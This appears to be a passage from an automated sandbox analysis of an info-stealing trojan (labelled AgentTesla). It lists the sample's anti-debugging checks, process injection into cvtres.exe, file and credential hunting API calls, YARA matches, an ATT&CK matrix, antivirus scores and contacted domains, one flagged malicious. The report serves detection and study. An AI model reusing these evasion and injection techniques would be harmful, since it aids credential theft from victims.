              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B1290 push ds; iretd 0_2_013B1296
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B12ED push ds; iretd 0_2_013B12EF
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B12D6 push ds; iretd 0_2_013B12D8
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B12C3 push ds; iretd 0_2_013B12C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00420874 push ecx; ret 1_2_00420887
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00427345 push ecx; ret 1_2_00427358
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0041899F LoadLibraryA,Sleep,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,1_2_0041899F
              Source: uGfpJynSWM.exeStatic PE information: real checksum: 0x65142 should be: 0x619f4
              Source: initial sampleStatic PE information: section name: .text entropy: 7.888541504684198

              Hooking and other Techniques for Hiding and Protection

              Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (92).png
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0041899F LoadLibraryA,Sleep,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,1_2_0041899F
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\uGfpJynSWM.exe TID: 6380Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 6396Thread sleep time: -600000s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00414F0E __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,GetSystemInfo,1_2_00414F0E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0041208D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcatA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcatA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,1_2_0041208D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0040C955 lstrcatA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,GetFileAttributesA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,1_2_0040C955
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00411117 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,FindNextFileA,FindClose,1_2_00411117
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_004101E9 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_sprintf,_memset,wsprintfA,StrCmpCA,StrCmpCA,GetFileAttributesA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_004101E9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_004162AB __EH_prolog3_GS,FindFirstFileW,FindNextFileW,1_2_004162AB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00408B15 __EH_prolog3_GS,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcatA,lstrlen,1_2_00408B15
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0041048F wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0041048F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0040954D wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,lstrcpy,lstrcatA,lstrcatA,StrCmpCA,wsprintfA,wsprintfA,lstrlen,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcatA,PathFindFileNameA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcatA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,PathMatchSpecA,lstrcpy,FindNextFileA,FindClose,1_2_0040954D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00411DA6 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,_memset,lstrcatA,lstrcatA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_00411DA6
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 120000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00409ADF lstrcatA,lstrcatA,lstrcatA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,1_2_00409ADF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeAPI call chain: ExitProcess graph end nodegraph_1-22798
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeAPI call chain: ExitProcess graph end nodegraph_1-23054
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeAPI call chain: ExitProcess graph end nodegraph_1-23052
              Source: uGfpJynSWM.exe, 00000000.00000002.337519094.0000000004070000.00000004.00000800.00020000.00000000.sdmp, uGfpJynSWM.exe, 00000000.00000002.337246414.0000000003F85000.00000004.00000800.00020000.00000000.sdmp, uGfpJynSWM.exe, 00000000.00000002.337026902.0000000003E9A000.00000004.00000800.00020000.00000000.sdmp, uGfpJynSWM.exe, 00000000.00000002.336750642.0000000003D91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %QDHgFSv
              Source: uGfpJynSWM.exe, 00000000.00000002.337932491.000000000415B000.00000004.00000800.00020000.00000000.sdmp, uGfpJynSWM.exe, 00000000.00000002.338200749.0000000004223000.00000004.00000800.00020000.00000000.sdmp, uGfpJynSWM.exe, 00000000.00000002.336549703.0000000003CC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %uGSvAQDHgFSvAQA
              Source: cvtres.exe, 00000001.00000002.594418105.0000000004CF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: uGfpJynSWM.exe, 00000000.00000002.338696445.00000000042EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %uGSvAQDHgFSvAQABAAAAibhYrwEAibhcrwEAibhsrwEAi0QkDIteSIPAKugj0///i0QkDItOSIPABFCLQQToruP//4tGSFnoOun//4tOSImGkAAAADPAObmkrwYAX1t0BbgAAAAFwgQAVYvsUYNl/ABTVleL8L8AQAAA6xuD+/90KFONhpQAAABQi87offn//zvDdSUBXfxXjZ6UAAAA6P/9//+L2IXbddOLRfy
              Source: cvtres.exe, 00000001.00000002.594418105.0000000004CF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-USn

              Anti Debugging

              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013BE628 CheckRemoteDebuggerPresent,0_2_013BE628
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00423890 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00423890
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0041899F LoadLibraryA,Sleep,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,1_2_0041899F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00414C66 __EH_prolog3_GS,GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,HeapAlloc,wsprintfA,1_2_00414C66
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeProcess queried: DebugPort
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeMemory allocated: page read and write | page guard
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00423890 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00423890
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0041DA9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0041DA9B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00428C1D SetUnhandledExceptionFilter,1_2_00428C1D

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\uGfpJynSWM.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 401000
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 435000
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 443000
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 459000
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 48B0008
              Source: uGfpJynSWM.exe, MJCKVKLUIOR/MJCKVKLUIOR.csReference to suspicious API methods: ('\\x08', 'GetProcAddress@kernel32'), ('\t', 'LoadLibraryA@kernel32')
              Source: uGfpJynSWM.exe, A/u000f.csReference to suspicious API methods: ('\t', 'GetProcAddress@kernel32.dll'), ('\\x1D', 'OpenProcess@kernel32.dll'), ('\\x08', 'GetProcAddress@kernel32.dll'), ('\\x1A', 'GetProcAddress@kernel32.dll'), ('\\x03', 'LoadLibrary@kernel32.dll'), ('\\x18', 'GetProcAddress@kernel32.dll'), ('\\x11', 'GetProcAddress@kernel32.dll'), ('\\x15', 'GetProcAddress@kernel32.dll')
              Source: 0.0.uGfpJynSWM.exe.830000.0.unpack, MJCKVKLUIOR/MJCKVKLUIOR.csReference to suspicious API methods: ('\\x08', 'GetProcAddress@kernel32'), ('\t', 'LoadLibraryA@kernel32')
              Source: 0.0.uGfpJynSWM.exe.830000.0.unpack, A/u000f.csReference to suspicious API methods: ('\t', 'GetProcAddress@kernel32.dll'), ('\\x1D', 'OpenProcess@kernel32.dll'), ('\\x08', 'GetProcAddress@kernel32.dll'), ('\\x1A', 'GetProcAddress@kernel32.dll'), ('\\x03', 'LoadLibrary@kernel32.dll'), ('\\x18', 'GetProcAddress@kernel32.dll'), ('\\x11', 'GetProcAddress@kernel32.dll'), ('\\x15', 'GetProcAddress@kernel32.dll')
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
              Source: uGfpJynSWM.exe, 00000000.00000002.336204598.0000000002BEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Progman
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeQueries volume information: C:\Users\user\Desktop\uGfpJynSWM.exe VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,1_2_0042E8D7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_0042A969
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree,1_2_0041593C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,1_2_0042E9B1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,1_2_0042A249
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,1_2_0042AA5E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,1_2_00429283
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,1_2_0042AB60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,1_2_0042AB05
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,1_2_00421BE1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,1_2_0042AD31
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,1_2_0042A537
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,1_2_004295ED
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,1_2_0042ADF1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,1_2_0042AE58
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: GetLocaleInfoA,1_2_00422ED2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,1_2_0042AE94
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00415890 __EH_prolog3_GS,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,1_2_00415890
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0040BE20 GetUserNameA,ExitProcess,1_2_0040BE20

              Stealing of Sensitive Information

              Source: Yara matchFile source: 0.2.uGfpJynSWM.exe.3be5530.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.uGfpJynSWM.exe.3be5530.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.336204598.0000000002BEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.334513678.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.334068069.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.333395548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.333726198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.336360720.0000000003BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: uGfpJynSWM.exe PID: 6360, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 6392, type: MEMORYSTR
              Source: Yara matchFile source: 00000001.00000002.594144374.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              Source: Yara matchFile source: 0.2.uGfpJynSWM.exe.3be5530.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.uGfpJynSWM.exe.3be5530.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.336204598.0000000002BEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.334513678.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.334068069.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.333395548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.333726198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.336360720.0000000003BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: uGfpJynSWM.exe PID: 6360, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 6392, type: MEMORYSTR
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 11 Native API; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Privilege Escalation: 312 Process Injection; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Defense Evasion: 11 Masquerading; 1 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 312 Process Injection; 1 Deobfuscate/Decode Files or Information; 4 Obfuscated Files or Information; 3 Software Packing; Indicator Removal from Tools; Masquerading
Credential Access: 1 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 131 Security Software Discovery; 31 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 Remote System Discovery; 2 File and Directory Discovery; 24 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
Collection: 1 Screen Capture; 1 Input Capture; 1 Archive Collected Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Command and Control: 21 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction

Source | Detection | Scanner | Label
uGfpJynSWM.exe | 68% | Virustotal |
uGfpJynSWM.exe | 31% | Metadefender |
uGfpJynSWM.exe | 81% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
uGfpJynSWM.exe | 100% | Joe Sandbox ML |

No Antivirus matches

Source | Detection | Scanner | Label
1.0.cvtres.exe.400000.0.unpack | 100% | Avira | TR/AD.GenSteal.nsaqr
1.0.cvtres.exe.400000.3.unpack | 100% | Avira | TR/AD.GenSteal.nsaqr
1.0.cvtres.exe.400000.4.unpack | 100% | Avira | TR/AD.GenSteal.nsaqr
0.2.uGfpJynSWM.exe.3be5530.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.0.cvtres.exe.400000.2.unpack | 100% | Avira | TR/AD.GenSteal.nsaqr
1.0.cvtres.exe.400000.1.unpack | 100% | Avira | TR/AD.GenSteal.nsaqr
1.0.cvtres.exe.400000.5.unpack | 100% | Avira | TR/AD.GenSteal.nsaqr

              No Antivirus matches

Name | IP | Active | Malicious | Antivirus Detection | Reputation
t.me | 149.154.167.99 | true | false | | high
climatejustice.social | 167.86.107.75 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
